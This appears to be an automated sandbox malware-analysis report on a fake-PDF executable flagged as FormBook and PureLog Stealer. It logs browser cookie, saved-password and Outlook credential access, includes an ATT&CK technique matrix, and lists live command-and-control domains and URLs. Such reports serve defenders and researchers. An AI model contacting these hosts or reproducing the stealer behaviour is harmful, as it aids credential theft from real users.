Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 6.2.PO-0005082025 pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.PO-0005082025 pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2976861734.0000000003230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2977853967.00000000009F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2291605179.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2978728918.0000000004FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2292265378.00000000018B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2978800956.0000000005010000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2978571194.0000000002970000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2293444782.0000000001E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.PO-0005082025 pdf.exe.7890000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-0005082025 pdf.exe.7890000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-0005082025 pdf.exe.4239970.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1764900052.0000000007890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1752661123.0000000004239000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\cttune.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\cttune.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 6.2.PO-0005082025 pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.PO-0005082025 pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2976861734.0000000003230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2977853967.00000000009F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2291605179.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2978728918.0000000004FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2292265378.00000000018B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2978800956.0000000005010000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2978571194.0000000002970000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2293444782.0000000001E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.PO-0005082025 pdf.exe.7890000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-0005082025 pdf.exe.7890000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-0005082025 pdf.exe.4239970.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1764900052.0000000007890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1752661123.0000000004239000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	412 Process Injection	1 Masquerading	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	11 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	412 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	113 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PO-0005082025 pdf.exe	39%	Virustotal		Browse
PO-0005082025 pdf.exe	68%	ReversingLabs	Win32.Backdoor.FormBook
PO-0005082025 pdf.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.milp.store/2j93/?N4ahwR=Vzef3oWXaGELtgURWqWViwZISDNuEbM3Ax3n2w42PW1Tdv5T/46T0viVyj66+7X9h8HGTeoaGJDhn+MaRcWt2Xz3j/2VHhm2H9/b4tezr7V2MsZ2w2FZo28=&SJ3=vToHyHVhRPNLk	0%	Avira URL Cloud	safe
https://static.loopia.se/responsive/images/iOS-72.png	0%	Avira URL Cloud	safe
https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking	0%	Avira URL Cloud	safe
https://static.loopia.se/shared/logo/logo-loopia-white.svg	0%	Avira URL Cloud	safe
http://www.milp.store/2j93/	0%	Avira URL Cloud	safe
https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw	0%	Avira URL Cloud	safe
http://www.jyshe18.buzz/1lpi/	0%	Avira URL Cloud	safe
http://www.jyshe18.buzz/	0%	Avira URL Cloud	safe
https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe	0%	Avira URL Cloud	safe
https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	0%	Avira URL Cloud	safe
https://static.loopia.se/shared/images/additional-pages-hero-shape.webp	0%	Avira URL Cloud	safe
https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	0%	Avira URL Cloud	safe
https://static.loopia.se/shared/style/2022-extra-pages.css	0%	Avira URL Cloud	safe
https://static.loopia.se/responsive/images/iOS-114.png	0%	Avira URL Cloud	safe
https://static.loopia.se/responsive/styles/reset.css	0%	Avira URL Cloud	safe
https://static.loopia.se/responsive/images/iOS-57.png	0%	Avira URL Cloud	safe
https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	0%	Avira URL Cloud	safe
http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut	0%	Avira URL Cloud	safe
https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	0%	Avira URL Cloud	safe
http://www.jyshe18.buzz	0%	Avira URL Cloud	safe
http://www.tabyscooterrentals.xyz/4wxo/?N4ahwR=AuCk/wTI7zW3ld/u5V6UHMq4RcE0g/F9prPfFK+Yc5xTqeXBXJi84rnX4QtnNLSqr4pLPSODfOM24Q7oPb8nltxO6UIdlQF5gha+7lDPiUWIden6rAvAG6A=&SJ3=vToHyHVhRPNLk	0%	Avira URL Cloud	safe
https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	0%	Avira URL Cloud	safe
https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb	0%	Avira URL Cloud	safe
https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.jyshe18.buzz	172.67.131.144	true	false	unknown
www.milp.store	194.9.94.85	true	true	unknown
natroredirect.natrocdn.com	85.159.66.93	true	false	high
www.ftaane.net	unknown	unknown	false	unknown
www.vavada-official.buzz	unknown	unknown	false	unknown
www.tabyscooterrentals.xyz	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.milp.store/2j93/?N4ahwR=Vzef3oWXaGELtgURWqWViwZISDNuEbM3Ax3n2w42PW1Tdv5T/46T0viVyj66+7X9h8HGTeoaGJDhn+MaRcWt2Xz3j/2VHhm2H9/b4tezr7V2MsZ2w2FZo28=&SJ3=vToHyHVhRPNLk	true	Avira URL Cloud: safe	unknown
http://www.milp.store/2j93/	true	Avira URL Cloud: safe	unknown
http://www.jyshe18.buzz/1lpi/	false	Avira URL Cloud: safe	unknown
http://www.tabyscooterrentals.xyz/4wxo/?N4ahwR=AuCk/wTI7zW3ld/u5V6UHMq4RcE0g/F9prPfFK+Yc5xTqeXBXJi84rnX4QtnNLSqr4pLPSODfOM24Q7oPb8nltxO6UIdlQF5gha+7lDPiUWIden6rAvAG6A=&SJ3=vToHyHVhRPNLk	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	cttune.exe, 0000000B.00000003.2487341739.0000000008258000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designersG	PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	cttune.exe, 0000000B.00000003.2487341739.0000000008258000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/?	PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers?	PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.tiro.com	PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	cttune.exe, 0000000B.00000003.2487341739.0000000008258000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers	PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://static.loopia.se/responsive/images/iOS-72.png	cttune.exe, 0000000B.00000002.2979842216.0000000005F58000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.2981271906.0000000007F50000.00000004.00000800.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2979188884.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.goodfont.co.kr	PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking	cttune.exe, 0000000B.00000002.2979842216.0000000005F58000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.2981271906.0000000007F50000.00000004.00000800.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2979188884.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jyshe18.buzz/	cttune.exe, 0000000B.00000002.2979842216.000000000627C000.00000004.10000000.00040000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2979188884.000000000341C000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.typography.netD	PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/staff/dennis.htm	PO-0005082025 pdf.exe, 00000000.00000002.1760425736.00000000073B2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://static.loopia.se/shared/logo/logo-loopia-white.svg	cttune.exe, 0000000B.00000002.2979842216.0000000005F58000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.2981271906.0000000007F50000.00000004.00000800.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2979188884.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe	cttune.exe, 0000000B.00000002.2979842216.0000000005F58000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000B.00000002.2981271906.0000000007F50000.00000004.00000800.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2979188884.00000000030F8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
